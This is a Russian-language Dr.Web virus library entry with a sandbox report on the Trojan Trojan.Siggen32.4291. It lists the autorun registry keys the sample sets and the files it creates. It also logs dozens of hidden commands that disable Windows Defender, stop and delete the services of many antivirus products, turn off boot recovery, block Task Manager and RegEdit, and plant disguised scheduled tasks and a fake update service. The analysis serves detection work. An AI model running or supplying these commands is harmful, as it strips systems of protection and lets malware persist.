ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

RU
RU CN DE EN ES FR IT JP KZ UZ PL BY ID
Закрыть

Переключение языка сайта

Сервисы
Сканеры
FixIt!
Dr.Web vxCube
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Trojan.Siggen32.4291

Добавлен в вирусную базу Dr.Web: 2025-10-30

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'LoadAppInit_DLLs' = '00000001'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'LoadAppInit_DLLs' = '00000001'
  • [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
  • [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'LoadAppInit_DLLs' = '00000001'
  • [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
  • [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'LoadAppInit_DLLs' = '00000001'
  • [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'UserInit' = '<SYSTEM32>\svchost8325.exe,<SYSTEM32>\userinit.exe,'
  • [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
  • [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'LoadAppInit_DLLs' = '00000001'
  • [HKCU\Environment] 'UserInitMprLogonScript' = '<SYSTEM32>\svchost8325.exe'
  • [HKLM\System\CurrentControlSet\Control\Session Manager\Environment] 'UserInitMprLogonScript' = '<SYSTEM32>\svchost8325.exe'
Создает или изменяет следующие файлы
  • <SYSTEM32>\tasks\microsoft\windows\windowsupdate\windowsupdatetask
  • <SYSTEM32>\tasks\microsoft\windows\application experience\programdataupdater
  • <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\consolidator
  • <SYSTEM32>\tasks\microsoft\windows\defrag\scheduleddefrag
  • <SYSTEM32>\tasks\microsoft\windows\diagnosis\scheduled
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
  • Диспетчера задач (Taskmgr)
  • Редактора реестра (RegEdit)
  • Системный антивирус (Защитник Windows)
блокирует:
  • Компонент восстановления системы (SR)
изменяет следующие системные настройки:
  • [HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
добавляет исключения антивируса:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true;"Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -DisableIOAVPro...
Запускает на исполнение
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="BlockWireshark" dir=in action=block protocol=TCP localport=1774,27017,27018,27019,27020
Запускает большое число процессов
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\cmd.exe
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\_mei37082\pythonwin\mfc140u.dll
  • %TEMP%\_mei37082\pythonwin\win32ui.pyd
  • %TEMP%\_mei37082\vcruntime140.dll
  • %TEMP%\_mei37082\vcruntime140_1.dll
  • %TEMP%\_mei37082\_bz2.pyd
  • %TEMP%\_mei37082\_ctypes.pyd
  • %TEMP%\_mei37082\_decimal.pyd
  • %TEMP%\_mei37082\_hashlib.pyd
  • %TEMP%\_mei37082\_lzma.pyd
  • %TEMP%\_mei37082\_socket.pyd
  • %TEMP%\_mei37082\_wmi.pyd
  • %TEMP%\_mei37082\base_library.zip
  • %TEMP%\_mei37082\libcrypto-3.dll
  • %TEMP%\_mei37082\libffi-8.dll
  • %TEMP%\_mei37082\psutil\_psutil_windows.pyd
  • %TEMP%\_mei37082\python3.dll
  • %TEMP%\_mei37082\python312.dll
  • %TEMP%\_mei37082\pywin32_system32\pythoncom312.dll
  • %TEMP%\_mei37082\pywin32_system32\pywintypes312.dll
  • %TEMP%\_mei37082\select.pyd
  • %TEMP%\_mei37082\unicodedata.pyd
  • %TEMP%\_mei37082\win32\_win32sysloader.pyd
  • %TEMP%\_mei37082\win32\perfmon.pyd
  • %TEMP%\_mei37082\win32\servicemanager.pyd
  • %TEMP%\_mei37082\win32\win32api.pyd
  • %TEMP%\_mei37082\win32\win32event.pyd
  • %TEMP%\_mei37082\win32\win32evtlog.pyd
  • %TEMP%\_mei37082\win32\win32process.pyd
  • %TEMP%\_mei37082\win32\win32security.pyd
  • %TEMP%\_mei37082\win32\win32service.pyd
  • %TEMP%\_mei37082\win32\win32trace.pyd
  • %TEMP%\_mei37082\win32\win32ts.pyd
  • %TEMP%\gen_py\3.12\__init__.py
  • %TEMP%\gen_py\3.12\dicts.dat
  • <SYSTEM32>\svchost8325.exe
  • %TEMP%\5h68kq3w
  • %TEMP%\task_7793.xml
  • %TEMP%\task_3143.xml
  • %TEMP%\task_9091.xml
  • %TEMP%\task_5488.xml
  • %TEMP%\task_1335.xml
  • %LOCALAPPDATA%\google\chrome\user data\default\extensions\helper5781\manifest.json
  • %LOCALAPPDATA%\google\chrome\user data\default\extensions\helper5781\background.js
  • %APPDATA%\mozilla\firefox\profiles\helper8257\manifest.json
  • %APPDATA%\mozilla\firefox\profiles\helper8257\background.js
Присваивает атрибут 'скрытый' для следующих файлов
  • <SYSTEM32>\svchost8325.exe
Удаляет следующие системные файлы
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\defender.psd1
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpcomputerstatus.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mppreference.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpscan.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpsignature.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreat.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreatcatalog.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreatdetection.cdxml
  • <SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpwdoscan.cdxml
Удаляет файлы, которые сам же создал
  • %TEMP%\5h68kq3w
  • %TEMP%\task_7793.xml
  • %TEMP%\task_3143.xml
  • %TEMP%\task_9091.xml
  • %TEMP%\task_5488.xml
  • %TEMP%\task_1335.xml
Другое
Перезапускает анализируемый образец
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c "systeminfo" (со скрытым окном)
  • '<SYSTEM32>\systeminfo.exe'
  • '<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (со скрытым окном)
  • '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
  • '<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} recoveryenabled no" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} advancedoptions false" (со скрытым окном)
  • '<SYSTEM32>\bcdedit.exe' /set {default} advancedoptions false
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /v OptionValue /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /v OptionValue /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true;"Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference ... (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "sc stop WinDefend" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop WinDefend
  • '<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\WindowsUpdate\WindowsUpdateTask /xml %TEMP%\task_7793.xml /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\WindowsUpdate\WindowsUpdateTask /xml %TEMP%\task_7793.xml /f
  • '<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "netsh advfirewall firewall add rule name="BlockWireshark" dir=in action=block protocol=TCP localport=1774,27017,27018,27019,27020" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Application Experience\ProgramDataUpdater" /xml %TEMP%\task_3143.xml /f" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop WdNisSvc
  • '<SYSTEM32>\schtasks.exe' /create /tn "Microsoft\Windows\Application Experience\ProgramDataUpdater" /xml %TEMP%\task_3143.xml /f
  • '<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /xml %TEMP%\task_9091.xml /f" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
  • '<SYSTEM32>\cmd.exe' /c "sc stop Sense" (со скрытым окном)
  • '<SYSTEM32>\schtasks.exe' /create /tn "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /xml %TEMP%\task_9091.xml /f
  • '<SYSTEM32>\sc.exe' stop Sense
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Defrag\ScheduledDefrag /xml %TEMP%\task_5488.xml /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled" (со скрытым окном)
  • '<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\Defrag\ScheduledDefrag /xml %TEMP%\task_5488.xml /f
  • '<SYSTEM32>\sc.exe' config Sense start= disabled
  • '<SYSTEM32>\cmd.exe' /c "sc stop SecurityHealthService" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Diagnosis\Scheduled /xml %TEMP%\task_1335.xml /f" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop SecurityHealthService
  • '<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\Diagnosis\Scheduled /xml %TEMP%\task_1335.xml /f
  • '<SYSTEM32>\cmd.exe' /c "sc config SecurityHealthService start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc create WinUpdate3910 "binPath= \"<SYSTEM32>\svchost8325.exe\"" "type= own" "start= auto" "error= normal"" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
  • '<SYSTEM32>\sc.exe' create WinUpdate3910 "binPath= \"<SYSTEM32>\svchost8325.exe\"" "type= own" "start= auto" "error= normal"
  • '<SYSTEM32>\cmd.exe' /c "sc description WinUpdate3910 "Windows Update Service"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' description WinUpdate3910 "Windows Update Service"
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update.lnk\") $S... (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\Windows Update.l... (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\cmd.exe' /c "sc delete WinDefend" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete WinDefend
  • '<SYSTEM32>\cmd.exe' /c "sc delete WdNisSvc" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete WdNisSvc
  • '<SYSTEM32>\cmd.exe' /c "sc delete Sense" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Sense
  • '<SYSTEM32>\cmd.exe' /c "sc delete SecurityHealthService" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete SecurityHealthService
  • '<SYSTEM32>\cmd.exe' /c "sc stop kavfs" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop kavfs
  • '<SYSTEM32>\cmd.exe' /c "sc delete kavfs" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete kavfs
  • '<SYSTEM32>\cmd.exe' /c "sc stop kavfss" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop kavfss
  • '<SYSTEM32>\cmd.exe' /c "sc delete kavfss" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete kavfss
  • '<SYSTEM32>\cmd.exe' /c "sc stop klim5" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop klim5
  • '<SYSTEM32>\cmd.exe' /c "sc delete klim5" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete klim5
  • '<SYSTEM32>\cmd.exe' /c "sc stop kl1" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop kl1
  • '<SYSTEM32>\cmd.exe' /c "sc delete kl1" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete kl1
  • '<SYSTEM32>\cmd.exe' /c "sc stop klif" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop klif
  • '<SYSTEM32>\cmd.exe' /c "sc delete klif" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete klif
  • '<SYSTEM32>\cmd.exe' /c "sc stop kneps" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop kneps
  • '<SYSTEM32>\cmd.exe' /c "sc delete kneps" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete kneps
  • '<SYSTEM32>\cmd.exe' /c "sc stop Norton" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Norton
  • '<SYSTEM32>\cmd.exe' /c "sc delete Norton" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Norton
  • '<SYSTEM32>\cmd.exe' /c "sc stop N360" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop N360
  • '<SYSTEM32>\cmd.exe' /c "sc delete N360" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete N360
  • '<SYSTEM32>\cmd.exe' /c "sc stop NIS" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop NIS
  • '<SYSTEM32>\cmd.exe' /c "sc delete NIS" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete NIS
  • '<SYSTEM32>\cmd.exe' /c "sc stop NAV" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop NAV
  • '<SYSTEM32>\cmd.exe' /c "sc delete NAV" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete NAV
  • '<SYSTEM32>\cmd.exe' /c "sc stop nisSrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop nisSrv
  • '<SYSTEM32>\cmd.exe' /c "sc delete nisSrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete nisSrv
  • '<SYSTEM32>\cmd.exe' /c "sc stop McAfee" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop McAfee
  • '<SYSTEM32>\cmd.exe' /c "sc delete McAfee" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete McAfee
  • '<SYSTEM32>\cmd.exe' /c "sc stop mcshield" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop mcshield
  • '<SYSTEM32>\cmd.exe' /c "sc delete mcshield" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete mcshield
  • '<SYSTEM32>\cmd.exe' /c "sc stop mfefire" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop mfefire
  • '<SYSTEM32>\cmd.exe' /c "sc delete mfefire" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete mfefire
  • '<SYSTEM32>\cmd.exe' /c "sc stop mfemms" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop mfemms
  • '<SYSTEM32>\cmd.exe' /c "sc delete mfemms" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete mfemms
  • '<SYSTEM32>\cmd.exe' /c "sc stop avast" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avast
  • '<SYSTEM32>\cmd.exe' /c "sc delete avast" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avast
  • '<SYSTEM32>\cmd.exe' /c "sc stop avastsvc" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avastsvc
  • '<SYSTEM32>\cmd.exe' /c "sc delete avastsvc" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avastsvc
  • '<SYSTEM32>\cmd.exe' /c "sc stop afwServ" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop afwServ
  • '<SYSTEM32>\cmd.exe' /c "sc delete afwServ" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete afwServ
  • '<SYSTEM32>\cmd.exe' /c "sc stop AVG" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop AVG
  • '<SYSTEM32>\cmd.exe' /c "sc delete AVG" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete AVG
  • '<SYSTEM32>\cmd.exe' /c "sc stop avgfws" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avgfws
  • '<SYSTEM32>\cmd.exe' /c "sc delete avgfws" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avgfws
  • '<SYSTEM32>\cmd.exe' /c "sc stop avgwd" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avgwd
  • '<SYSTEM32>\cmd.exe' /c "sc delete avgwd" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avgwd
  • '<SYSTEM32>\cmd.exe' /c "sc stop avgemc" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avgemc
  • '<SYSTEM32>\cmd.exe' /c "sc delete avgemc" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avgemc
  • '<SYSTEM32>\cmd.exe' /c "sc stop Bitdefender" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Bitdefender
  • '<SYSTEM32>\cmd.exe' /c "sc delete Bitdefender" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Bitdefender
  • '<SYSTEM32>\cmd.exe' /c "sc stop bdagent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop bdagent
  • '<SYSTEM32>\cmd.exe' /c "sc delete bdagent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete bdagent
  • '<SYSTEM32>\cmd.exe' /c "sc stop vsserv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop vsserv
  • '<SYSTEM32>\cmd.exe' /c "sc delete vsserv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete vsserv
  • '<SYSTEM32>\cmd.exe' /c "sc stop ESET" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop ESET
  • '<SYSTEM32>\cmd.exe' /c "sc delete ESET" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete ESET
  • '<SYSTEM32>\cmd.exe' /c "sc stop ekrn" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop ekrn
  • '<SYSTEM32>\cmd.exe' /c "sc delete ekrn" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete ekrn
  • '<SYSTEM32>\cmd.exe' /c "sc stop ehdrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop ehdrv
  • '<SYSTEM32>\cmd.exe' /c "sc delete ehdrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete ehdrv
  • '<SYSTEM32>\cmd.exe' /c "sc stop Avira" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Avira
  • '<SYSTEM32>\cmd.exe' /c "sc delete Avira" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Avira
  • '<SYSTEM32>\cmd.exe' /c "sc stop avguard" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avguard
  • '<SYSTEM32>\cmd.exe' /c "sc delete avguard" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avguard
  • '<SYSTEM32>\cmd.exe' /c "sc stop avshadow" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop avshadow
  • '<SYSTEM32>\cmd.exe' /c "sc delete avshadow" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete avshadow
  • '<SYSTEM32>\cmd.exe' /c "sc stop Trend Micro" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Trend Micro
  • '<SYSTEM32>\cmd.exe' /c "sc delete Trend Micro" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Trend Micro
  • '<SYSTEM32>\cmd.exe' /c "sc stop tmccsf" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop tmccsf
  • '<SYSTEM32>\cmd.exe' /c "sc delete tmccsf" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete tmccsf
  • '<SYSTEM32>\cmd.exe' /c "sc stop tmlisten" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop tmlisten
  • '<SYSTEM32>\cmd.exe' /c "sc delete tmlisten" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete tmlisten
  • '<SYSTEM32>\cmd.exe' /c "sc stop Malwarebytes" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Malwarebytes
  • '<SYSTEM32>\cmd.exe' /c "sc delete Malwarebytes" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Malwarebytes
  • '<SYSTEM32>\cmd.exe' /c "sc stop MBAMService" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop MBAMService
  • '<SYSTEM32>\cmd.exe' /c "sc delete MBAMService" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete MBAMService
  • '<SYSTEM32>\cmd.exe' /c "sc stop MBEndpointAgent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop MBEndpointAgent
  • '<SYSTEM32>\cmd.exe' /c "sc delete MBEndpointAgent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete MBEndpointAgent
  • '<SYSTEM32>\cmd.exe' /c "sc stop Comodo" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Comodo
  • '<SYSTEM32>\cmd.exe' /c "sc delete Comodo" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Comodo
  • '<SYSTEM32>\cmd.exe' /c "sc stop cmdagent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop cmdagent
  • '<SYSTEM32>\cmd.exe' /c "sc delete cmdagent" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete cmdagent
  • '<SYSTEM32>\cmd.exe' /c "sc stop cavwp" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop cavwp
  • '<SYSTEM32>\cmd.exe' /c "sc delete cavwp" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete cavwp
  • '<SYSTEM32>\cmd.exe' /c "sc stop Panda" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Panda
  • '<SYSTEM32>\cmd.exe' /c "sc delete Panda" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Panda
  • '<SYSTEM32>\cmd.exe' /c "sc stop psanhost" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop psanhost
  • '<SYSTEM32>\cmd.exe' /c "sc delete psanhost" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete psanhost
  • '<SYSTEM32>\cmd.exe' /c "sc stop pavsrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop pavsrv
  • '<SYSTEM32>\cmd.exe' /c "sc delete pavsrv" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete pavsrv
  • '<SYSTEM32>\cmd.exe' /c "sc stop Webroot" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Webroot
  • '<SYSTEM32>\cmd.exe' /c "sc delete Webroot" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Webroot
  • '<SYSTEM32>\cmd.exe' /c "sc stop wrsssdk" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop wrsssdk
